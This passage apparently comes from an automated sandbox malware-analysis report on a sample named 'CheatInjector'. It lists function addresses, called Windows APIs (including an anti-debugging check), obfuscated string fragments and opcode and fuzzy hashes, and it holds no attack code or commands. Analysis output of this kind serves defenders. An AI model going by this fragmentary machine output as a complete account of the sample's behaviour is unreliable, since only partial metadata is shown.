                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004DDFF2
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004DE0B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale$ErrorLast
                                                                • String ID:
                                                                • API String ID: 661929714-0
                                                                • Opcode ID: 6b5ab315fc523655fedd91b54028fdf48344cfca85dcfd98e663961ce6957d5b
                                                                • Instruction ID: 7cfaf572fc95556cbe875dc5cbff8095e0f9b89df015971c2ff2a919064489d4
                                                                • Opcode Fuzzy Hash: 6b5ab315fc523655fedd91b54028fdf48344cfca85dcfd98e663961ce6957d5b
                                                                • Instruction Fuzzy Hash: 3D61B471600117AFDB25AF26CCA2BBB77A8EF04304F14407BE915CA385E778D996CB58
                                                                Function 004CB4F3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004CB5EB
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004CB5F5
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 004CB602
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 882484716957615413df4c5772cb804a55869d654e0766fbc9fc3e5c86d1fbee
                                                                • Instruction ID: db8e86649867d85e9a51f53a1798057e25572267b6aac5db4b38b51834673efe
                                                                • Opcode Fuzzy Hash: 882484716957615413df4c5772cb804a55869d654e0766fbc9fc3e5c86d1fbee
                                                                • Instruction Fuzzy Hash: 6931E5789012289BCB61DF25DD89BCDBBB8BF08314F5041EAE50CA7251EB749F858F49
                                                                Function 005136A0 Relevance: 4.2, Strings: 3, Instructions: 454COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [3^=$^?>9$MO
                                                                • API String ID: 0-2984903194
                                                                • Opcode ID: 8f78cbf7408c242e076c8cdfb5c8bf2ae78bed10aa8b0fde84be0d00e808d995
                                                                • Instruction ID: 65e45fe1ad71997f6251d73e2f166e08a6bd19abb611cf1c7a3224ba5fde93b9
                                                                • Opcode Fuzzy Hash: 8f78cbf7408c242e076c8cdfb5c8bf2ae78bed10aa8b0fde84be0d00e808d995
                                                                • Instruction Fuzzy Hash: 3FC15AB15183008BE724DF25C8627ABBBF1FF92354F188A5CE0D58B3A0E7749945CB92
                                                                Function 0051EC6D Relevance: 4.2, Strings: 3, Instructions: 442COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: *XJm$B\dn$Wg0>
                                                                • API String ID: 0-336436074
                                                                • Opcode ID: fdccdcea25a674e7f25e873154fed8dab35564d2d394f9e727fbcf1d84b46b2f
                                                                • Instruction ID: 5758364c96150d740465b1636a9c2f4d344e1828465022cf040675d5c092cf4f
                                                                • Opcode Fuzzy Hash: fdccdcea25a674e7f25e873154fed8dab35564d2d394f9e727fbcf1d84b46b2f
                                                                • Instruction Fuzzy Hash: 89E1B231204B828EE7258F3984557F3FFE2AF66304F18896DC4EB87682D735A549CB61
                                                                Function 004EF758 Relevance: 4.1, Strings: 3, Instructions: 389COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -$gfff$gfff
                                                                • API String ID: 0-837351935
                                                                • Opcode ID: fa93bc9afbd1dd26882519429843d715e2f6a0870b720133efd4587a99214889
                                                                • Instruction ID: 6ae6db33db36cfb2ee33c60fd9a8f43751a390223660f5e776f250fcb614224c
                                                                • Opcode Fuzzy Hash: fa93bc9afbd1dd26882519429843d715e2f6a0870b720133efd4587a99214889
                                                                • Instruction Fuzzy Hash: 78E1BF3160C3958FC715CF29C48026AFBE1AFD9314F088A6EE9D987392D238D949CB56
                                                                Function 004FC230 Relevance: 4.1, Strings: 3, Instructions: 374COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: APXU$I\[Z$iT]H
                                                                • API String ID: 0-3810016924
                                                                • Opcode ID: f03b7e201e411eec251d5d492b8de5899b730ca8c61601c4bda576af5c62a314
                                                                • Instruction ID: 511ab77a3589ea231d7bfef6ef9178f65065bc099942fe254f06afa5313f7f43
                                                                • Opcode Fuzzy Hash: f03b7e201e411eec251d5d492b8de5899b730ca8c61601c4bda576af5c62a314
                                                                • Instruction Fuzzy Hash: 48C1F4B16083948FD310DF25C88576BBBE1EBC5318F148A2DE5D89B382D738C805CB96
                                                                Function 005184BB Relevance: 4.1, Strings: 3, Instructions: 344COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #>#$$*- $$
                                                                • API String ID: 0-1880930406
                                                                • Opcode ID: 6dc9c61980aa76f771c5acad8ef3d4e4d3adaca09186d1cf64c02e7c208a3ec2
                                                                • Instruction ID: 300543a14a29d60f7495b6a8c1ef0166eebd26a9d0108bce3832f5e7809ce581
                                                                • Opcode Fuzzy Hash: 6dc9c61980aa76f771c5acad8ef3d4e4d3adaca09186d1cf64c02e7c208a3ec2
                                                                • Instruction Fuzzy Hash: 3EB127319087968BF7348A6484413FBBFD2FF95340F698E2ED89587381DB349885D792
                                                                Function 00510178 Relevance: 4.1, Strings: 3, Instructions: 317COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,-$k9x?$l)h/
                                                                • API String ID: 0-2006396305
                                                                • Opcode ID: 1692f7ca95136b13182e5be59d2198b0050b86aadb5fd64c959a15a87ab87dc7
                                                                • Instruction ID: 449d2279e0443d75e8e88ad79fb0e22c4faebf241b1ebcb655cc33472bdd972c
                                                                • Opcode Fuzzy Hash: 1692f7ca95136b13182e5be59d2198b0050b86aadb5fd64c959a15a87ab87dc7
                                                                • Instruction Fuzzy Hash: 5C9104715183018BD714CF28C8926ABBBF1FFD5314F09A91CE4968B391E3B8C984CB96
                                                                Function 0051AE2E Relevance: 3.9, Strings: 3, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: KJUT$Cb3$Cb3
                                                                • API String ID: 0-24669580
                                                                • Opcode ID: d106a316b728b1d64932e3f6ce383980921438da80ee6a69f8b251ca7ff503eb
                                                                • Instruction ID: a6c5f98049d97cc658de7236c9ca4e1a21b5f228415824ee8f3d297ee9582709
                                                                • Opcode Fuzzy Hash: d106a316b728b1d64932e3f6ce383980921438da80ee6a69f8b251ca7ff503eb
                                                                • Instruction Fuzzy Hash: 1331287A6063009FF31A8B219890B7A7B93FFE5301F2A492DD49547552C3B59C828B87
                                                                Function 004D59C6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,004D2E4B,?,20001004,00000000,00000002,?,?,004D244D), ref: 004D59FA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: F<L
                                                                • API String ID: 2299586839-2278513700
                                                                • Opcode ID: 932cea404a0595d16eb67a1db1456d986743bee62dd364b37f26c1c6a52f1499
                                                                • Instruction ID: 8761432aa26c37a90c5986c26d2ca724c6149a247feee344f219e60bfccca7b8
                                                                • Opcode Fuzzy Hash: 932cea404a0595d16eb67a1db1456d986743bee62dd364b37f26c1c6a52f1499
                                                                • Instruction Fuzzy Hash: 4FE09A32900568BBCF022F21DC14EAE3B15AB80722F400023F8052A3218B369821AA9C
                                                                Function 004D0470 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 276b97fbd984da2656be2fafbcceb2476177e29d667066f5566847cfd156f8c7
                                                                • Instruction ID: eb07e3cc140d3db85468ac3d4c5e575147c4d49d89542bdb9408b071a93e92d9
                                                                • Opcode Fuzzy Hash: 276b97fbd984da2656be2fafbcceb2476177e29d667066f5566847cfd156f8c7
                                                                • Instruction Fuzzy Hash: E6F13B71E002199FDF14DFA9C990BAEB7B1EF88314F15826AE815AB380D734AD458F94
                                                                Function 00511A00 Relevance: 3.0, Strings: 2, Instructions: 454COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X$fL[D
                                                                • API String ID: 0-711819152
                                                                • Opcode ID: e05be3ffe68211727660bfcc73f289aee6f205b59a5ed7d7cdc1e8a5e9c1c702
                                                                • Instruction ID: 5c7c2497739b2a7d50b9d3faa787437e63eb092155174fec1ac513af34e13677
                                                                • Opcode Fuzzy Hash: e05be3ffe68211727660bfcc73f289aee6f205b59a5ed7d7cdc1e8a5e9c1c702
                                                                • Instruction Fuzzy Hash: 99D10071A08350ABE3009F25DC42BAFBFE5EFD2314F18886DFA8497241D6799C458B97
                                                                Function 005154E0 Relevance: 2.9, Strings: 2, Instructions: 438COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $%&'$KJUT
                                                                • API String ID: 0-2429939721
                                                                • Opcode ID: 39a4fc55d01d6ac5c68998330575d24d6aa87c60acb901d0db245c19585b9c19
                                                                • Instruction ID: 1ce7e236b72f3973a6741ff64c289042488e451ef5056a18b738bca592389f11
                                                                • Opcode Fuzzy Hash: 39a4fc55d01d6ac5c68998330575d24d6aa87c60acb901d0db245c19585b9c19
                                                                • Instruction Fuzzy Hash: 1EC1D472918610DBE7149B24C8527BBBBE1FFD5324F69892CE98697281F334D881C792
                                                                Function 0050FCA6 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,9;%$|}
                                                                • API String ID: 0-1701042479
                                                                • Opcode ID: 4b9a3badac333e49ed14fad28328faeae52b02d8c5fd761f7ad7106138e303c7
                                                                • Instruction ID: fa38e5738ee5be244b95f58fea5756647064da7b60483b4d5f41f60a35bded77
                                                                • Opcode Fuzzy Hash: 4b9a3badac333e49ed14fad28328faeae52b02d8c5fd761f7ad7106138e303c7
                                                                • Instruction Fuzzy Hash: 88B1DEB15083418BD710CF25C89166FBFE1BBD5314F188A2CE4D55B292E7788A498B97
                                                                Function 005194D0 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Cb3$Cb3
                                                                • API String ID: 0-587873792
                                                                • Opcode ID: e2346e5e20832d9ca5664cd2b8d94be3758d406285dcd265de27ed58aa2a4500
                                                                • Instruction ID: 7d47bfa3c0d22a65d441a00d88041330ef36b98265f786dadc429a4d1e121ff9
                                                                • Opcode Fuzzy Hash: e2346e5e20832d9ca5664cd2b8d94be3758d406285dcd265de27ed58aa2a4500
                                                                • Instruction Fuzzy Hash: 748168B6A043104FE3119E65DCE17BB7A92FFD2314F2A443DE9818B392E2749C85C792
                                                                Function 0052CFE0 Relevance: 2.8, Strings: 2, Instructions: 293COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$KJUT
                                                                • API String ID: 0-455853084
                                                                • Opcode ID: 375daaa888fec10c42c46f01505ac2370f2e5dc2777132d8070a4dbd9f171016
                                                                • Instruction ID: 4e00457da3330d31d3876022d00065644876da12e3484e2479926a6dac7fe389
                                                                • Opcode Fuzzy Hash: 375daaa888fec10c42c46f01505ac2370f2e5dc2777132d8070a4dbd9f171016
                                                                • Instruction Fuzzy Hash: 93A198B56083418BD714CF18D88576BBBE2FFCA304F24892DE99587391D775E806CBA2
                                                                Function 0051E435 Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: |eqz$|n =
                                                                • API String ID: 0-306079729
                                                                • Opcode ID: a42ee87d90f4dbbc0ff4b3c8205aa0a26e503dd68ee607768a4ed131d38a23ca
                                                                • Instruction ID: e6267703fb3f315952f11f91b81d50ab95702a2a169c1255d33261b2174f5f25
                                                                • Opcode Fuzzy Hash: a42ee87d90f4dbbc0ff4b3c8205aa0a26e503dd68ee607768a4ed131d38a23ca
                                                                • Instruction Fuzzy Hash: 1981E8702087818FF3258B3584A57B3BFE2AF63304F18895DD5E74B282D779A4498B66
                                                                Function 0051E4CB Relevance: 2.8, Strings: 2, Instructions: 267COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: |eqz$|n =
                                                                • API String ID: 0-306079729
